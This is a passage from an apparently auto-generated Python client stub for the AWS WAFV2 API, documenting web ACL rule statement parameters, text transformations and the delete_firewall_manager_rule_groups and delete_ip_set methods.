sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nXssMatchStatement (dict) --A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in byte, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a WebACL , returned by operations like create and list. This provides information like the ID, that you can use to retrieve and manage a WebACL , and the ARN, that you provide to operations like AssociateWebACL .
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
The unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def delete_firewall_manager_rule_groups(WebACLArn=None, WebACLLockToken=None):
"""
Deletes all rule groups that are managed by AWS Firewall Manager for the specified web ACL.
You can only use this if ManagedByFirewallManager is false in the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_firewall_manager_rule_groups(
WebACLArn='string',
WebACLLockToken='string'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL.\n
:type WebACLLockToken: string
:param WebACLLockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextWebACLLockToken': 'string'
}
Response Structure
(dict) --
NextWebACLLockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextWebACLLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
def delete_ip_set(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
